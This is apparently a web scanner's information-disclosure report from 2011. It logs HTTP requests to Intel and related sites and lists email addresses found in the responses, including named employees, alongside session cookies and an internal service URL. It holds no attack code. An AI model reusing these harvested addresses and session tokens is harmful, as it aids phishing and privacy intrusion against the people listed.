GET /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:17 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5699 t=1296947777549940 Connection: close Content-Length: 38836
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/2010/12/why_non-techies_should_consider_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:17 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=10275 t=1296947777188938 Connection: close Content-Length: 35786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=4760 t=1296947779216933 Vary: Accept-Encoding Connection: close Content-Length: 36265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/2011/01/top_ten_reasons_i_work_for_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5263 t=1296947779269283 Connection: close Content-Length: 41979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/2011/01/you_want_me_to_move_where.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:18 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=4500 t=1296947778837871 Connection: close Content-Length: 33718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/about-us/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=6041 t=1296947782477121 Connection: close Content-Length: 64858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/just-for-students/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:22 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=7672 t=1296947782408018 Vary: Accept-Encoding Connection: close Content-Length: 88344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/life-at-intel/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5613 t=1296947779536465 Connection: close Content-Length: 72711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/your-future/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=4807 t=1296947779399903 Connection: close Content-Length: 38135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
TenSafeF...@gmail.com
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
blair.muller@gmail.com
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
neonspice@gmail.com
Request
GET /2007/10/jquerylocalscroll-10.html HTTP/1.1 Host: flesler.blogspot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:17:48 GMT Date: Sat, 05 Feb 2011 23:17:48 GMT Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e" X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g ...[SNIP]... <BR/>my e-mail is neonspice@gmail.com</p> ...[SNIP]...
The following email address was disclosed in the response:
GONNAWHISTLE@GMAIL.COM
Request
GET /feeds/api/videos/ZM0ptMqNhso/related HTTP/1.1 Host: gdata.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 200 OK X-GData-User-Country: FR Content-Type: application/atom+xml; charset=UTF-8 Expires: Sat, 05 Feb 2011 23:22:52 GMT Date: Sat, 05 Feb 2011 23:22:52 GMT Cache-Control: private, max-age=300, no-transform Vary: * GData-Version: 1.0 Last-Modified: Sat, 05 Feb 2011 23:22:52 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close Content-Length: 118452
<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:app='http://purl.org/atom/app#' xmlns:media='http://search.yahoo.com/mrss/' xmlns:openSearch='http://a9.com/-/spec ...[SNIP]... OME PART OF OUR EXPERIENCE!! OUR FREE MP3 SOUNDCLOUD DOWNLOAD TO OUR DEBUT SONG "HOME- EDWARD SHARPE AND THE MAGNETIC ZEROS ACOUSTIC COVER BY JORGE AND ALEXA NARVAEZ"!! ENJOY!!!!! snd.sc CONTACT US AT GONNAWHISTLE@GMAIL.COM Here's how this video came about. It was 11:00pm. After 9 or 10 practice runs with a mic that was off the entire time, we were so tired and bummed out! On the last try, she yawns and couldn't wait to ...[SNIP]... OME PART OF OUR EXPERIENCE!! OUR FREE MP3 SOUNDCLOUD DOWNLOAD TO OUR DEBUT SONG "HOME- EDWARD SHARPE AND THE MAGNETIC ZEROS ACOUSTIC COVER BY JORGE AND ALEXA NARVAEZ"!! ENJOY!!!!! snd.sc CONTACT US AT GONNAWHISTLE@GMAIL.COM Here's how this video came about. It was 11:00pm. After 9 or 10 practice runs with a mic that was off the entire time, we were so tired and bummed out! On the last try, she yawns and couldn't wait to ...[SNIP]...
HTTP/1.1 200 OK Server: Apache serviceURL: http://inside.intel.com:80/presto/edge/api/rest/LOPFeedMashup/Invoke?presto_user=$session/username&presto_password=$session/password&SN%253DLOPMASHUP05%2526DT%253DCLOB%2526SIP%253D%2526STARTINDEX%253D1%2526COUNT%253D10%2526CF%253Dcached%2526ON%253DrunMashup Content-Language: en-US Vary: Accept-Encoding CacheHit: D=397254 t=1296905367018642 Content-Type: text/xml;charset=UTF-8 Cache-Control: max-age=1060 Expires: Sat, 05 Feb 2011 23:29:54 GMT Date: Sat, 05 Feb 2011 23:12:14 GMT Connection: close Content-Length: 44278
<?xml version="1.0" encoding="UTF-8"?> <feed xmlns="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:atom="http://www.w3.org/2005/Atom" xmln ...[SNIP]... BR/>Remember &#8220;A thread in time can easily become nine&#8221;<BR/><BR/>as we discussed last week we are looking for interesting tags to sign off with. Submit your ideas to: parallelprogrammingtalk@intel.com<BR/><BR/>We&#8217;ll use the best and you will be famous.</content> ...[SNIP]... read, add some synchronization&#8221; and my personal favorite: &#8220;Keep your powder dry and your threads safe&#8221; We know there are many more and invite you to submit your ideas to: parallelprogrammingtalk@intel.com<BR/><BR/>If we chuckle &#8211; we&#8217;ll use your suggestion and give you a personal shout-out.<BR/><BR/>Tune in next week , Jan 18th at the usual time 8am for a show ...[SNIP]...
The following email addresses were disclosed in the response:
contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com
Request
GET /about HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 23:21:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 15111
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
The following email addresses were disclosed in the response:
digita@ibi.tu-berlin.de
intel_bildung@flutlicht.biz
ireland.esc.hire@intel.com
webadmin@intel.com
Request
GET /community/feeds/allcontent HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:14:17 GMT Server: Apache Last-Modified: Sat, 05 Feb 2011 18:20:50 GMT ETag: "1296930050887" X-JAL: 20 Content-Language: en-US CacheHit: D=24681 t=1296947657604353 X-JSL: D=24686 t=1296947657604353 Cache-Control: no-cache Content-Type: text/xml;charset=UTF-8 Connection: close
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"> <channel> <title>Int ...[SNIP]... -link-external-small" href="http://www.intel.com/jobs/Ireland">www.intel.com/jobs/Ireland</a> to find out more and apply, or email your cv to: <a class="jive-link-email-small" href="mailto:ireland.esc.hire@intel.com">ireland.esc.hire@intel.com</a>.</div></div><!-- [DocumentBodyEnd:89aa55a4-2241-4dea-b3ca-187740dbffe6] --></description> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... iv id="_mcePaste">Christine Koll&eacute;ra &amp; Marie-Kristin Mehlitz</div><div id="_mcePaste"><span>E-Mail: </span><a class="jive-link-email-small" href="mailto:intel_bildung@flutlicht.biz">intel_bildung@flutlicht.biz</a><span> </span></div><div id="_mcePaste">Telefon: +49 (0) 911 / 474950</div><br><br><div>Dar&#252;ber hinaus laden wir Sie herzlich ein zur ...[SNIP]... rum Bildung der didacta auf dem Gel&auml;nde der Messe Stuttgart in <strong>Halle 1, Stand 1K72</strong>. Wir bitten Sie, sich unter <a class="jive-link-external-small" href="mailto:digita@ibi.tu-berlin.de">digita@ibi.tu-berlin.de</a> f&#252;r die Preisverleihung anzumelden; bitte geben Sie an, ob Sie Eintrittskarten f&#252;r die didacta ben&#246;tigen. &Uuml;berreicht werden die Auszeichnungen durch die d ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]...
The following email addresses were disclosed in the response:
digita@ibi.tu-berlin.de
intel_bildung@flutlicht.biz
webadmin@intel.com
Request
GET /community/feeds/documents HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:14:21 GMT Server: Apache Last-Modified: Thu, 03 Feb 2011 14:17:51 GMT ETag: "1296742671571" X-JAL: 21 Content-Language: en-US CacheHit: D=25875 t=1296947661324041 X-JSL: D=25880 t=1296947661324041 Cache-Control: no-cache Content-Type: text/xml;charset=UTF-8 Connection: close
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"> <channel> <title>Int ...[SNIP]... iv id="_mcePaste">Christine Koll&eacute;ra &amp; Marie-Kristin Mehlitz</div><div id="_mcePaste"><span>E-Mail: </span><a class="jive-link-email-small" href="mailto:intel_bildung@flutlicht.biz">intel_bildung@flutlicht.biz</a><span> </span></div><div id="_mcePaste">Telefon: +49 (0) 911 / 474950</div><br><br><div>Dar&#252;ber hinaus laden wir Sie herzlich ein zur ...[SNIP]... rum Bildung der didacta auf dem Gel&auml;nde der Messe Stuttgart in <strong>Halle 1, Stand 1K72</strong>. Wir bitten Sie, sich unter <a class="jive-link-external-small" href="mailto:digita@ibi.tu-berlin.de">digita@ibi.tu-berlin.de</a> f&#252;r die Preisverleihung anzumelden; bitte geben Sie an, ob Sie Eintrittskarten f&#252;r die didacta ben&#246;tigen. &Uuml;berreicht werden die Auszeichnungen durch die d ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]... <author>webadmin@intel.com</author> ...[SNIP]...
The following email address was disclosed in the response:
info@objectivemarketer.com
Request
GET / HTTP/1.1 Host: objectivemarketer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:09 GMT Server: Apache X-Powered-By: PHP/5.2.16 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: User-Agent,Accept,Accept-Encoding Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/ Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/ Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following email addresses were disclosed in the response:
Katie_Eisenhart@dell.com
agnes.ck.kwan@intel.com
dave.erskine@amd.com
gail.dundas@intel.com
heather.mackinnon@bm.com
info@myst-technology.com
j.lucas@ssi.samsung.com
kari.e.aakre@intel.com
krisfair@lenovo.com
mjkang@lgdisplay.com
nick.knupffer@intel.com
rbates@societyforscience.org
Request
GET /rss/intel-master-pressfeed.xml HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email addresses were disclosed in the response:
sam@hocevar.net
sam@zoy.org
Request
GET /wtfpl/ HTTP/1.1 Host: sam.zoy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:12 GMT Server: Apache/1.3.34 (Debian) PHP/5.2.0-10+lenny1 X-Powered-By: PHP/5.2.6-1+lenny9 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 9819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml11.dtd">
The following email address was disclosed in the response:
parallelprogrammingtalk@intel.com
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]... <p>As we discussed last week we are looking for interesting tags to sign off with. Submit your ideas to: parallelprogrammingtalk@intel.com</p> ...[SNIP]...
The following email address was disclosed in the response:
parallelprogrammingtalk@intel.com
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]... yourself hanging by a thread, add some synchronization... and my personal favorite: ...Keep your powder dry and your threads safe... We know there are many more and invite you to submit your ideas to: parallelprogrammingtalk@intel.com</p> ...[SNIP]...
The following email addresses were disclosed in the response:
gnu@gnu.org
web-translators@gnu.org
webmasters@gnu.org
you@example.com
Request
GET /licenses/gpl.html HTTP/1.1 Host: www.gnu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:47 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 23:17:47 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 49695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The following email address was disclosed in the response:
ganeshread@gmail.com
Request
GET /sitewide/js/jquery-plugins.js HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intc.com/index.cfm?iid=ftr+invrel Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Content-Location: http://www.intc.com/sitewide/js/jquery-plugins.js Last-Modified: Fri, 26 Feb 2010 22:09:00 GMT Accept-Ranges: bytes ETag: "0664e4c30b7ca1:9339d" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:12:57 GMT Content-Length: 15319
/** ********************************************************************************** PLEASE NOTE! THIS IS A MODIFIED VERSION OF JCAROUSELLITE TO ALLOW FOR "PAUSE" FUNCTIONALITY. http://www.erikho ...[SNIP]... 2 callbacks. The functions will be passed an argument that represents an array of elements that * are visible at the time of callback. * * * @cat Plugins/Image Gallery * @author Ganeshji Marwaha/ganeshread@gmail.com */
(function($) { // Compliant with jquery.noConflict() $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: null,
The following email address was disclosed in the response:
tom.waldrop@intel.com
Request
GET /about/companyinfo/policy/index.htm?iid=subhdr+info_policy HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 